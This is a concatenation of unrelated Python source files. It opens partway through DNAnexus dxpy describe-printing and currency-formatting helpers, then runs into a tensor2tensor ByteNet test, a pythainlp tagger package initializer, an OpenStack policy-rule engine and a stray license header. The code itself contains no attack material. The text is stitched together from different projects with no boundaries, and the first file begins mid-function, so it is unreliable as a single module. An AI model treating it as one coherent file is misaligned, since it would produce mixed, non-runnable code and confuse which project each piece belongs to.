            if isinstance(cloned_sys_reqs, dict):
                if cloned_sys_reqs == desc.get('systemRequirements'):
                    print_nofill_field(" sys reqs", json.dumps(cloned_sys_reqs) + ' (same)')
                else:
                    print_nofill_field(" sys reqs", YELLOW() + json.dumps(cloned_sys_reqs) + ENDC())
    if not desc.get('isFree') and desc.get('totalPrice') is not None:
        print_field('Total Price', format_currency(desc['totalPrice'], meta=desc['currency']))
    if desc.get('invoiceMetadata'):
        print_json_field("Invoice Metadata", desc['invoiceMetadata'])
    if desc.get('sshHostKey'):
        print_nofill_field("SSH Host Key", printable_ssh_host_key(desc['sshHostKey']))

    # Dump anything not handled above as raw JSON.
    for field in desc:
        if field not in recognized_fields:
            print_json_field(field, desc[field])


def locale_from_currency_code(dx_code):
    """
    This is a (temporary) hardcoded mapping between currency_list.json in nucleus and standard
    locale string useful for further formatting

    :param dx_code: An id of nucleus/commons/pricing_models/currency_list.json collection
    :return: standardised locale, eg 'en_US'; None when no mapping found
    """
    return {0: 'en_US', 1: 'en_GB'}.get(dx_code)


def format_currency_from_meta(value, meta):
    """
    Formats currency value into properly decorated currency string based on provided currency metadata.
    Please note that this is very basic solution missing some of the localisation features (such as
    negative symbol position and type.

    Better option is to use 'locale' module to reflect currency string decorations more accurately.

    See 'format_currency'

    :param value:
    :param meta:
    :return:
    """
    pieces = []
    # .. TODO: some locales position neg symbol elsewhere, missing meta
    if value < 0:
        pieces.append('-')
    if meta['symbolPosition'] == 'left':
        pieces.append(meta['symbol'])
    # .. TODO: take the group and decimal separators from meta into account (US & UK are the same, so far we're safe)
    pieces.append('{:,.2f}'.format(abs(value)))
    if meta['symbolPosition'] == 'right':
        pieces.append(' %s' % meta['symbol'])
    return ''.join(pieces)


def format_currency(value, meta, currency_locale=None):
    """
    Formats currency value into properly decorated currency string based on either locale (preferred)
    or if that is not available then currency metadata. Until locale is provided from the server
    a crude mapping between `currency.dxCode` and a locale string is used instead (eg 0: 'en_US')

    :param value: amount
    :param meta: server metadata (`currency`)
    :return: formatted currency string
    """
    try:
        resolved_locale = currency_locale
        if resolved_locale is None:
            resolved_locale = locale_from_currency_code(meta['dxCode'])
        if resolved_locale is None:
            # No locale known for this currency code; format from metadata.
            return format_currency_from_meta(value, meta)
        locale.setlocale(locale.LC_ALL, resolved_locale)
        return locale.currency(value, grouping=True)
    except locale.Error:
        # .. locale is probably not available -> fallback to format manually
        return format_currency_from_meta(value, meta)


def print_user_desc(desc):
    """Pretty-print the describe hash of a user account."""
    print_field("ID", desc["id"])
    middle = (desc["middle"] + " ") if desc["middle"] != '' else ''
    print_field("Name", "{0} {1}{2}".format(desc["first"], middle, desc["last"]))
    if "email" in desc:
        print_field("Email", desc["email"])
    if "billTo" in desc:
        print_field("Default bill to", desc["billTo"])
    if "appsInstalled" in desc:
        print_list_field("Apps installed", desc["appsInstalled"])

def print_generic_desc(desc):
    """Print every field of *desc* as raw JSON, with no prettifying."""
    for key, value in desc.items():
        print_json_field(key, value)

def print_desc(desc, verbose=False):
    '''
    :param desc: The describe hash of a DNAnexus entity
    :type desc: dict

    Dispatch to the class-specific printer for *desc*, falling back to the
    generic data-object printer for unrecognized classes.
    '''
    entity_class = desc['class']
    if entity_class in ('project', 'workspace', 'container'):
        print_project_desc(desc, verbose=verbose)
    elif entity_class == 'app':
        print_app_desc(desc, verbose=verbose)
    elif entity_class == 'globalworkflow':
        print_globalworkflow_desc(desc, verbose=verbose)
    elif entity_class in ('job', 'analysis'):
        print_execution_desc(desc)
    elif entity_class == 'user':
        print_user_desc(desc)
    elif entity_class in ('org', 'team'):
        print_generic_desc(desc)
    else:
        print_data_obj_desc(desc, verbose=verbose)

def get_ls_desc(desc, print_id=False):
    """Return the short (ls-style) listing line for *desc*; executables are
    rendered bold green, and the ID is appended when *print_id* is True."""
    suffix = ' : ' + desc['id'] if print_id is True else ''
    name = desc['name']
    if desc['class'] in ('applet', 'workflow'):
        name = BOLD() + GREEN() + name + ENDC()
    return name + suffix


def print_ls_desc(desc, **kwargs):
    """Print the short (ls-style) listing line for *desc*."""
    line = get_ls_desc(desc, **kwargs)
    print(line)


def get_ls_l_header():
    """Return the bolded column header line for `ls -l` style listings."""
    columns = [
        'State', DELIMITER('   '),
        'Last modified', DELIMITER('       '),
        'Size', DELIMITER('      '),
        'Name', DELIMITER(' ('),
        'ID', DELIMITER(')'),
    ]
    return BOLD() + ''.join(columns) + ENDC()


def print_ls_l_header():
    """Print the column header line for `ls -l` style listings."""
    header = get_ls_l_header()
    print(header)


def get_ls_l_desc_fields():
    """Return the describe-field selection required by get_ls_l_desc
    (every listed field requested)."""
    return dict.fromkeys(
        ('id', 'class', 'folder', 'length', 'modified',
         'name', 'project', 'size', 'state'),
        True)


def get_ls_l_desc(desc, include_folder=False, include_project=False):
    """
    Render one `ls -l` style listing line for *desc*.

    desc must have at least all the fields given by get_ls_l_desc_fields.
    """
    # If you make this method consume an additional field, you must add it to
    # get_ls_l_desc_fields above.

    # State column: closed objects are green, everything else yellow.
    if 'state' in desc:
        state = desc['state']
        state_len = len(state)
        color = GREEN() if state == 'closed' else YELLOW()
        state_str = color + state + ENDC()
    else:
        state_str, state_len = '', 0

    # Name column, optionally prefixed with the folder; executables in bold green.
    name_str = desc['name']
    if include_folder:
        folder = desc['folder']
        name_str = folder + ('/' if folder != '/' else '') + name_str
    if desc['class'] in ('applet', 'workflow'):
        name_str = BOLD() + GREEN() + name_str + ENDC()

    # Size column: human-readable bytes for files, row count otherwise.
    if 'size' in desc and desc['class'] == 'file':
        size_str = get_size_str(desc['size'])
    elif 'length' in desc:
        size_str = str(desc['length']) + ' rows'
    else:
        size_str = ''
    size_padding = ' ' * max(0, 9 - len(size_str))

    project_prefix = (desc['project'] + DELIMITER(':')) if include_project else ''
    return (state_str +
            DELIMITER(' ' * (8 - state_len)) + render_short_timestamp(desc['modified']) +
            DELIMITER(' ') + size_str +
            DELIMITER(size_padding + ' ') + name_str +
            DELIMITER(' (') + project_prefix + desc['id'] +
            DELIMITER(')'))


def print_ls_l_desc(desc, **kwargs):
    """Print one `ls -l` style listing line for *desc*."""
    line = get_ls_l_desc(desc, **kwargs)
    print(line)


def get_find_executions_string(desc, has_children, single_result=False, show_outputs=True,
                               is_cached_result=False):
    '''
    :param desc: hash of execution's describe output
    :param has_children: whether the execution has children to be printed
    :param single_result: whether the execution is displayed as a single result or as part of an execution tree
    :param is_cached_result: whether the execution should be formatted as a cached result
    :returns: multi-line string rendering this execution for `dx find executions` output
    '''
    # Top-level tree entries (analyses, top-level jobs, or single results)
    # get a "* " bullet when no field delimiter is in effect.
    is_not_subjob = desc['parentJob'] is None or desc['class'] == 'analysis' or single_result
    result = ("* " if is_not_subjob and get_delimiter() is None else "")
    canonical_execution_name = desc['executableName']
    if desc['class'] == 'job':
        canonical_execution_name += ":" + desc['function']
    execution_name = desc.get('name', '<no name>')

    # Format the name of the execution
    if is_cached_result:
        result += BOLD() + "[" + ENDC()
    result += BOLD() + BLUE()
    if desc['class'] == 'analysis':
        result += UNDERLINE()
    result += execution_name + ENDC()

    # Show the canonical executable name alongside the display name when they
    # differ (treating "name" and "name:main" as equivalent).
    if execution_name != canonical_execution_name and execution_name+":main" != canonical_execution_name:
        result += ' (' + canonical_execution_name + ')'

    if is_cached_result:
        result += BOLD() + "]" + ENDC()

    # Format state
    result += DELIMITER(' (') + JOB_STATES(desc['state']) + DELIMITER(') ') + desc['id']

    # Add unicode pipe to child if necessary
    result += DELIMITER('\n' + (u'│ ' if is_not_subjob and has_children else ("  " if is_not_subjob else "")))
    result += desc['launchedBy'][5:] + DELIMITER(' ')
    result += render_short_timestamp(desc['created'])

    cached_and_runtime_strs = []

    if is_cached_result:
        cached_and_runtime_strs.append(YELLOW() + "cached" + ENDC())

    if desc['class'] == 'job':
        # Only print runtime if it ever started running
        if desc.get('startedRunning'):
            # Timestamps are in milliseconds; // 1000 converts to seconds.
            if desc['state'] in ['done', 'failed', 'terminated', 'waiting_on_output']:
                runtime = datetime.timedelta(seconds=int(desc['stoppedRunning']-desc['startedRunning'])//1000)
                cached_and_runtime_strs.append("runtime " + str(runtime))
            elif desc['state'] == 'running':
                seconds_running = max(int(time.time()-desc['startedRunning']//1000), 0)
                msg = "running for {rt}".format(rt=datetime.timedelta(seconds=seconds_running))
                cached_and_runtime_strs.append(msg)

    if cached_and_runtime_strs:
        result += " (" + ", ".join(cached_and_runtime_strs) + ")"

    if show_outputs:
        # Continue the tree-drawing prefix on output/failure lines.
        prefix = DELIMITER('\n' + (u'│ ' if is_not_subjob and has_children else ("  " if is_not_subjob else "")))
        if desc.get("output") != None:
            result += job_output_to_str(desc['output'], prefix=prefix)
        elif desc['state'] == 'failed' and 'failureReason' in desc:
            result += prefix + BOLD() + desc['failureReason'] + ENDC() + ": " + fill(desc.get('failureMessage', ''),
                                                                                     subsequent_indent=prefix.lstrip('\n'))

    return result

def print_locked_workflow_note():
    """Explain that a locked workflow's stage inputs cannot be overridden at run time."""
    note = ('This workflow has an explicit input specification (i.e. it is locked), '
            'and as such stage inputs cannot be modified at run-time.')
    print_field('Note', note)

# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ByteNet tests."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np

from tensor2tensor.data_generators import problem_hparams
from tensor2tensor.models import bytenet

import tensorflow as tf


class ByteNetTest(tf.test.TestCase):
  """Smoke tests for the ByteNet model."""

  def testByteNet(self):
    """Run ByteNet forward on random integer features and check the logits shape."""
    vocab_size = 9
    # np.random.random_integers is deprecated (and removed in recent NumPy);
    # randint's upper bound is exclusive, so randint(1, vocab_size) draws the
    # same range [1, vocab_size - 1] as random_integers(1, vocab_size - 1).
    x = np.random.randint(1, high=vocab_size, size=(3, 5, 1, 1))
    y = np.random.randint(1, high=vocab_size, size=(3, 6, 1, 1))
    hparams = bytenet.bytenet_base()
    p_hparams = problem_hparams.test_problem_hparams(vocab_size, vocab_size)
    with self.test_session() as session:
      features = {
          "inputs": tf.constant(x, dtype=tf.int32),
          "targets": tf.constant(y, dtype=tf.int32),
      }
      model = bytenet.ByteNet(
          hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
      logits, _ = model(features)
      session.run(tf.global_variables_initializer())
      res = session.run(logits)
    # Expected logits shape: (batch, time, 1, 1, vocab_size).
    self.assertEqual(res.shape, (3, 50, 1, 1, vocab_size))


# Run the test suite when this file is executed directly.
if __name__ == "__main__":
  tf.test.main()

# -*- coding: utf-8 -*-
"""
Linguistic and other taggers.

Tagging each token in a sentence with supplementary information,
such as its part-of-speech (POS) tag, and named entity (NE) tag.
"""

# Public API of the pythainlp.tag package, re-exported from submodules below.
__all__ = [
    "PerceptronTagger",
    "pos_tag",
    "pos_tag_sents",
    "tag_provinces",
    "chunk_parse",
    "NER",
]

from pythainlp.tag.locations import tag_provinces
from pythainlp.tag.pos_tag import pos_tag, pos_tag_sents
from pythainlp.tag._tag_perceptron import PerceptronTagger
from pythainlp.tag.chunk import chunk_parse
from pythainlp.tag.named_entity import NER

# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""
Common Policy Engine Implementation

Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.

In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass.  These innermost lists are then
combined as with an "or" conjunction.  This is the original way of
expressing policies, but there now exists a new way: the policy
language.

In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check.  However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.

As an example, take the following rule, expressed in the list-of-lists
representation::

    [["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]

In the policy language, this becomes::

    role:admin or (project_id:%(project_id)s and role:projectadmin)

The policy language also has the "not" operator, allowing a richer
policy rule::

    project_id:%(project_id)s and not role:dunce

Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access.  (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.)  Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""

import abc
import re
import urllib
import urllib2

from oslo.config import cfg
import six

from kwstandby.openstack.common import fileutils
from kwstandby.openstack.common.gettextutils import _
from kwstandby.openstack.common import jsonutils
from kwstandby.openstack.common import log as logging

# Configuration options: where the policy file lives and which rule to fall
# back to when a requested rule is not defined.
policy_opts = [
    cfg.StrOpt('policy_file',
               default='policy.json',
               help=_('JSON file containing policy')),
    cfg.StrOpt('policy_default_rule',
               default='default',
               help=_('Rule enforced when requested rule is not found')),
]

CONF = cfg.CONF
CONF.register_opts(policy_opts)

LOG = logging.getLogger(__name__)

# NOTE(review): appears to be the module-level registry of named check
# implementations, populated elsewhere in this module — confirm.
_checks = {}


class PolicyNotAuthorized(Exception):
    """Raised when a policy rule rejects the requested action."""

    def __init__(self, rule):
        message = _("Policy doesn't allow %s to be performed.") % rule
        super(PolicyNotAuthorized, self).__init__(message)


class Rules(dict):
    """A store for rules. Handles the default_rule setting directly."""

    @classmethod
    def load_json(cls, data, default_rule=None):
        """Allow loading of JSON rule data."""
        # Parse each serialized rule string into its check form.
        parsed = {}
        for name, rule_str in jsonutils.loads(data).items():
            parsed[name] = parse_rule(rule_str)
        return cls(parsed, default_rule)

    def __init__(self, rules=None, default_rule=None):
        """Initialize the Rules store."""
        super(Rules, self).__init__(rules or {})
        self.default_rule = default_rule

    def __missing__(self, key):
        """Implements the default rule handling."""
        # Fall back to the default rule only when it is both set and defined;
        # otherwise behave like a normal dict lookup failure.
        default = self.default_rule
        if default and default in self:
            return self[default]
        raise KeyError(key)

    def __str__(self):
        """Dumps a string representation of the rules."""
        # TrueCheck singletons serialize to the empty string by convention.
        out_rules = dict(
            (name, '' if isinstance(check, TrueCheck) else str(check))
            for name, check in self.items())
        # Dump a pretty-printed JSON representation
        return jsonutils.dumps(out_rules, indent=4)


class Enforcer(object):
    """Responsible for loading and enforcing rules.

    :param policy_file: Custom policy file to use, if none is
                        specified, `CONF.policy_file` will be
                        used.
    :param rules: Default dictionary / Rules to use. It will be
                  considered just in the first instantiation. If
                  `load_rules(True)`, `clear()` or `set_rules(True)`
                  is called this will be overwritten.
    :param default_rule: Default rule to use, CONF.default_rule will
                         be used if none is specified.
    """

    def __init__(self, policy_file=None, rules=None, default_rule=None):
        self.rules = Rules(rules)
        self.default_rule = default_rule or CONF.policy_default_rule

        # Resolved lazily (and cached) by load_rules()/_get_policy_path().
        self.policy_path = None
        self.policy_file = policy_file or CONF.policy_file

    def set_rules(self, rules, overwrite=True):
        """Create a new Rules object based on the provided dict of rules.

        :param rules: New rules to use. It should be an instance of dict.
        :param overwrite: Whether to overwrite current rules or update them
                          with the new rules.

        :raises: TypeError if ``rules`` is not a dict.
        """

        if not isinstance(rules, dict):
            raise TypeError(_("Rules must be an instance of dict or Rules, "
                            "got %s instead") % type(rules))

        if overwrite:
            self.rules = Rules(rules)
        else:
            # Fix: this previously called self.update(rules), which raised
            # AttributeError since Enforcer has no update() method.  The
            # merge belongs on the Rules dict itself.
            self.rules.update(rules)

    def clear(self):
        """Clears Enforcer rules, policy's cache and policy's path."""
        self.set_rules({})
        self.policy_path = None

    def load_rules(self, force_reload=False):
        """Loads policy_path's rules.

        Policy file is cached and will be reloaded if modified.

        :param force_reload: Whether to overwrite current rules.
        """

        if not self.policy_path:
            self.policy_path = self._get_policy_path()

        reloaded, data = fileutils.read_cached_file(self.policy_path,
                                                    force_reload=force_reload)

        if reloaded:
            # File changed on disk (or reload was forced): reparse it.
            rules = Rules.load_json(data, self.default_rule)
            self.set_rules(rules)
            LOG.debug(_("Rules successfully reloaded"))

    def _get_policy_path(self):
        """Locate the policy json data file.

        :returns: The policy path

        :raises: ConfigFilesNotFoundError if the file couldn't
                 be located.
        """
        policy_file = CONF.find_file(self.policy_file)

        if policy_file:
            return policy_file

        raise cfg.ConfigFilesNotFoundError(path=CONF.policy_file)

    def enforce(self, rule, target, creds, do_raise=False,
                exc=None, *args, **kwargs):
        """Checks authorization of a rule against the target and credentials.

        :param rule: A string or BaseCheck instance specifying the rule
                    to evaluate.
        :param target: As much information about the object being operated
                    on as possible, as a dictionary.
        :param creds: As much information about the user performing the
                    action as possible, as a dictionary.
        :param do_raise: Whether to raise an exception or not if check
                        fails.
        :param exc: Class of the exception to raise if the check fails.
                    Any remaining arguments passed to check() (both
                    positional and keyword arguments) will be passed to
                    the exception class. If not specified, PolicyNotAuthorized
                    will be used.

        :return: Returns False if the policy does not allow the action and
                exc is not provided; otherwise, returns a value that
                evaluates to True.  Note: for rules using the "case"
                expression, this True value will be the specified string
                from the expression.
        """

        # NOTE(flaper87): Not logging target or creds to avoid
        # potential security issues.
        LOG.debug(_("Rule %s will be now enforced") % rule)

        # Pick up any on-disk policy changes before evaluating.
        self.load_rules()

        # Allow the rule to be a Check tree
        if isinstance(rule, BaseCheck):
            result = rule(target, creds, self)
        elif not self.rules:
            # No rules to reference means we're going to fail closed
            result = False
        else:
            try:
                # Evaluate the rule
                result = self.rules[rule](target, creds, self)
            except KeyError:
                LOG.debug(_("Rule [%s] doesn't exist") % rule)
                # If the rule doesn't exist, fail closed
                result = False

        # If it is False, raise the exception if requested
        if do_raise and not result:
            if exc:
                raise exc(*args, **kwargs)

            raise PolicyNotAuthorized(rule)

        return result


class BaseCheck(object):
    """Abstract base class for Check classes."""

    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def __str__(self):
        """Return the policy-language text of the Check tree rooted here."""

    @abc.abstractmethod
    def __call__(self, target, cred):
        """Perform the check.

        Returns False to reject the access, or a true value (not
        necessarily True) to accept it.
        """


class FalseCheck(BaseCheck):
    """A policy check that always returns False (disallow)."""

    def __str__(self):
        """Return the policy-language representation, '!'."""

        return "!"

    def __call__(self, target, cred):
        """Deny unconditionally."""

        return False


class TrueCheck(BaseCheck):
    """A policy check that always returns True (allow)."""

    def __str__(self):
        """Return the policy-language representation, '@'."""

        return "@"

    def __call__(self, target, cred):
        """Allow unconditionally."""

        return True


class Check(BaseCheck):
    """A base class to allow for user-defined policy checks."""

    def __init__(self, kind, match):
        """Store the two halves of a "kind:match" check.

        :param kind: The kind of the check, i.e., the field before the
                     ':'.
        :param match: The match of the check, i.e., the field after
                      the ':'.
        """

        self.kind = kind
        self.match = match

    def __str__(self):
        """Render the check back to its "kind:match" form."""

        return "%s:%s" % (self.kind, self.match)


class NotCheck(BaseCheck):
    """Implements the "not" logical operator.

    A policy check that inverts the result of another policy check.
    """

    def __init__(self, rule):
        """Initialize the 'not' check.

        :param rule: The rule to negate.  Must be a Check.
        """

        self.rule = rule

    def __str__(self):
        """Return a string representation of this check."""

        return "not %s" % self.rule

    def __call__(self, target, cred):
        """Return the logical inverse of the wrapped check's result."""

        return not self.rule(target, cred)


class AndCheck(BaseCheck):
    """Implements the "and" logical operator.

    A policy check that requires that a list of other checks all return True.
    """

    def __init__(self, rules):
        """Initialize the 'and' check.

        :param rules: A list of rules that will be tested.
        """

        self.rules = rules

    def __str__(self):
        """Return a string representation of this check."""

        return "(%s)" % ' and '.join(str(r) for r in self.rules)

    def __call__(self, target, cred):
        """Check the policy.

        Accepts only if every sub-rule accepts.
        """

        return all(rule(target, cred) for rule in self.rules)

    def add_check(self, rule):
        """Append one more rule to be tested.

        Returns the AndCheck object itself for convenient chaining.
        """

        self.rules.append(rule)
        return self


class OrCheck(BaseCheck):
    """Implements the "or" operator.

    A policy check that requires that at least one of a list of other
    checks returns True.
    """

    def __init__(self, rules):
        """Initialize the 'or' check.

        :param rules: A list of rules that will be tested.
        """

        self.rules = rules

    def __str__(self):
        """Return a string representation of this check."""

        return "(%s)" % ' or '.join(str(r) for r in self.rules)

    def __call__(self, target, cred):
        """Check the policy.

        Accepts if at least one sub-rule accepts.
        """

        return any(rule(target, cred) for rule in self.rules)

    def add_check(self, rule):
        """Append one more rule to be tested.

        Returns the OrCheck object itself for convenient chaining.
        """

        self.rules.append(rule)
        return self


def _parse_check(rule):
    """Parse a single base check rule into an appropriate Check object."""

    # The two singleton special rules come first.
    if rule == '!':
        return FalseCheck()
    if rule == '@':
        return TrueCheck()

    try:
        kind, match = rule.split(':', 1)
    except Exception:
        LOG.exception(_("Failed to understand rule %s") % rule)
        # If the rule is invalid, we'll fail closed
        return FalseCheck()

    # Dispatch to the registered handler for this kind, falling back to
    # the generic (None) handler when one is registered.
    handler = _checks.get(kind, _checks.get(None))
    if handler is None:
        LOG.error(_("No handler for matches of kind %s") % kind)
        return FalseCheck()
    return handler(kind, match)


def _parse_list_rule(rule):
    """Translates the old list-of-lists syntax into a tree of Check objects.

    Provided for backwards compatibility.
    """

    # Empty rule defaults to True
    if not rule:
        return TrueCheck()

    # Outer list is joined by "or"; inner list by "and"
    or_list = []
    for inner_rule in rule:
        # Elide empty inner lists
        if not inner_rule:
            continue

        # A bare string counts as a one-element inner list.
        if isinstance(inner_rule, basestring):
            inner_rule = [inner_rule]

        # Parse the inner rules into Check objects
        and_list = [_parse_check(r) for r in inner_rule]

        # A single check needs no AndCheck wrapper.
        or_list.append(and_list[0] if len(and_list) == 1
                       else AndCheck(and_list))

    # If we have only one check, omit the "or"
    if not or_list:
        return FalseCheck()
    if len(or_list) == 1:
        return or_list[0]
    return OrCheck(or_list)


# Used for tokenizing the policy language
_tokenize_re = re.compile(r'\s+')


def _parse_tokenize(rule):
    """Tokenizer for the policy language.

    Most of the single-character tokens are specified in the
    _tokenize_re; however, parentheses need to be handled specially,
    because they can appear inside a check string.  Thankfully, those
    parentheses that appear inside a check string can never occur at
    the very beginning or end ("%(variable)s" is the correct syntax).
    """

    for tok in _tokenize_re.split(rule):
        # Skip empty tokens
        if not tok or tok.isspace():
            continue

        # Handle leading parens on the token
        clean = tok.lstrip('(')
        for i in range(len(tok) - len(clean)):
            yield '(', '('

        # If it was only parentheses, continue
        if not clean:
            continue
        else:
            tok = clean

        # Handle trailing parens on the token
        clean = tok.rstrip(')')
        trail = len(tok) - len(clean)

        # Yield the cleaned token
        lowered = clean.lower()
        if lowered in ('and', 'or', 'not'):
            # Special tokens
            yield lowered, clean
        elif clean:
            # Not a special token, but not composed solely of ')'
            if len(tok) >= 2 and ((tok[0], tok[-1]) in
                                  [('"', '"'), ("'", "'")]):
                # It's a quoted string
                yield 'string', tok[1:-1]
            else:
                yield 'check', _parse_check(clean)

        # Yield the trailing parens
        for i in range(trail):
            yield ')', ')'


class ParseStateMeta(type):
    """Metaclass for the ParseState class.

    Facilitates identifying reduction methods.
    """

    def __new__(mcs, name, bases, cls_dict):
        """Create the class.

        Injects the 'reducers' list, a list of tuples matching token sequences
        to the names of the corresponding reduction methods.
        """

        # Collect every (token-sequence, method-name) pair declared via
        # the @reducer decorator on the class's methods.
        reducers = [(reduction, attr_name)
                    for attr_name, attr in cls_dict.items()
                    if hasattr(attr, 'reducers')
                    for reduction in attr.reducers]

        cls_dict['reducers'] = reducers

        return super(ParseStateMeta, mcs).__new__(mcs, name, bases, cls_dict)


def reducer(*tokens):
    """Decorator for reduction methods.

    Arguments are a sequence of tokens, in order, which should trigger running
    this reduction method.
    """

    def decorator(func):
        # Lazily create the per-function list of reducer sequences,
        # then record this token sequence on it.
        sequences = getattr(func, 'reducers', None)
        if sequences is None:
            func.reducers = sequences = []
        sequences.append(list(tokens))

        return func

    return decorator


class ParseState(object):
    """Implement the core of parsing the policy language.

    Uses a greedy reduction algorithm to reduce a sequence of tokens into
    a single terminal, the value of which will be the root of the Check tree.

    Note: error reporting is rather lacking.  The best we can get with
    this parser formulation is an overall "parse failed" error.
    Fortunately, the policy language is simple enough that this
    shouldn't be that big a problem.
    """

    # NOTE: Python 2-style metaclass declaration.  The metaclass builds
    # the 'reducers' table of (token-sequence, method-name) pairs from
    # the @reducer decorators below.  (Under Python 3 this assignment
    # has no effect — confirm before porting.)
    __metaclass__ = ParseStateMeta

    def __init__(self):
        """Initialize the ParseState."""

        # Parallel stacks kept in lockstep: tokens[i] is the token type,
        # values[i] the corresponding value (e.g. a Check for 'check').
        self.tokens = []
        self.values = []

    def reduce(self):
        """Perform a greedy reduction of the token stream.

        If a reducer method matches, it will be executed, then the
        reduce() method will be called recursively to search for any more
        possible reductions.
        """

        for reduction, methname in self.reducers:
            # A reducer fires when its token sequence exactly matches the
            # top of the token stack.
            if (len(self.tokens) >= len(reduction) and
                    self.tokens[-len(reduction):] == reduction):
                # Get the reduction method
                meth = getattr(self, methname)

                # Reduce the token stream; the method receives the matched
                # values and returns replacement (token, value) pairs.
                results = meth(*self.values[-len(reduction):])

                # Splice the results over the matched suffix of both
                # stacks, keeping them in lockstep.
                self.tokens[-len(reduction):] = [r[0] for r in results]
                self.values[-len(reduction):] = [r[1] for r in results]

                # Check for any more reductions
                return self.reduce()

    def shift(self, tok, value):
        """Adds one more token to the state.  Calls reduce()."""

        self.tokens.append(tok)
        self.values.append(value)

        # Do a greedy reduce...
        self.reduce()

    @property
    def result(self):
        """Obtain the final result of the parse.

        Raises ValueError if the parse failed to reduce to a single result.
        """

        if len(self.values) != 1:
            raise ValueError("Could not parse rule")
        return self.values[0]

    @reducer('(', 'check', ')')
    @reducer('(', 'and_expr', ')')
    @reducer('(', 'or_expr', ')')
    def _wrap_check(self, _p1, check, _p2):
        """Turn parenthesized expressions into a 'check' token."""

        return [('check', check)]

    @reducer('check', 'and', 'check')
    def _make_and_expr(self, check1, _and, check2):
        """Create an 'and_expr'.

        Join two checks by the 'and' operator.
        """

        return [('and_expr', AndCheck([check1, check2]))]

    @reducer('and_expr', 'and', 'check')
    def _extend_and_expr(self, and_expr, _and, check):
        """Extend an 'and_expr' by adding one more check."""

        return [('and_expr', and_expr.add_check(check))]

    @reducer('check', 'or', 'check')
    def _make_or_expr(self, check1, _or, check2):
        """Create an 'or_expr'.

        Join two checks by the 'or' operator.
        """

        return [('or_expr', OrCheck([check1, check2]))]

    @reducer('or_expr', 'or', 'check')
    def _extend_or_expr(self, or_expr, _or, check):
        """Extend an 'or_expr' by adding one more check."""

        return [('or_expr', or_expr.add_check(check))]

    @reducer('not', 'check')
    def _make_not_expr(self, _not, check):
        """Invert the result of another check."""

        return [('check', NotCheck(check))]


def _parse_text_rule(rule):
    """Parses policy to the tree.

    Translates a policy written in the policy language into a tree of
    Check objects.
    """

    # Empty rule means always accept
    if not rule:
        return TrueCheck()

    # Feed tokens through the shift/reduce parser.
    state = ParseState()
    for token, value in _parse_tokenize(rule):
        state.shift(token, value)

    try:
        return state.result
    except ValueError:
        # Couldn't parse the rule
        LOG.exception(_("Failed to understand rule %(rule)r") % locals())

        # Fail closed
        return FalseCheck()


def parse_rule(rule):
    """Parses a policy rule into a tree of Check objects."""

    # Strings are written in the policy language; anything else is the
    # legacy list-of-lists syntax.
    parser = (_parse_text_rule if isinstance(rule, basestring)
              else _parse_list_rule)
    return parser(rule)


def register(name, func=None):
    """Register a function or Check class as a policy check.

    :param name: Gives the name of the check type, e.g., 'rule',
                 'role', etc.  If name is None, a default check type
                 will be registered.
    :param func: If given, provides the function or class to register.
                 If not given, returns a function taking one argument
                 to specify the function or class to register,
                 allowing use as a decorator.
    """

    def decorator(check):
        # Perform the actual registration; return the callable so the
        # decorator interface is preserved.
        _checks[name] = check
        return check

    # Direct-call form: register(name, func).
    if func:
        return decorator(func)

    # Decorator form: @register(name).
    return decorator


@register("rule")
class RuleCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Recursively checks credentials based on the defined rules."""

        try:
            return enforcer.rules[self.match](target, creds, enforcer)
        except KeyError:
            # Undefined rule: fail closed.
            return False


@register("role")
class RoleCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check that there is a matching role in the cred dict."""

        wanted = self.match.lower()
        return any(role.lower() == wanted for role in creds['roles'])


@register('http')
class HttpCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check http: rules by calling to a remote server.

        This example implementation simply verifies that the response
        is exactly 'True'.
        """

        url = ('http:' + self.match) % target
        post_data = urllib.urlencode({'target': jsonutils.dumps(target),
                                      'credentials': jsonutils.dumps(creds)})
        response = urllib2.urlopen(url, post_data)
        return response.read() == "True"


@register(None)
class GenericCheck(Check):
    def __call__(self, target, creds, enforcer):
        """Check an individual match.

        Matches look like:

            tenant:%(tenant_id)s
            role:compute:admin
        """

        # TODO(termie): do dict inspection via dot syntax
        match = self.match % target
        try:
            cred_value = creds[self.kind]
        except KeyError:
            return False
        return match == six.text_type(cred_value)

# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
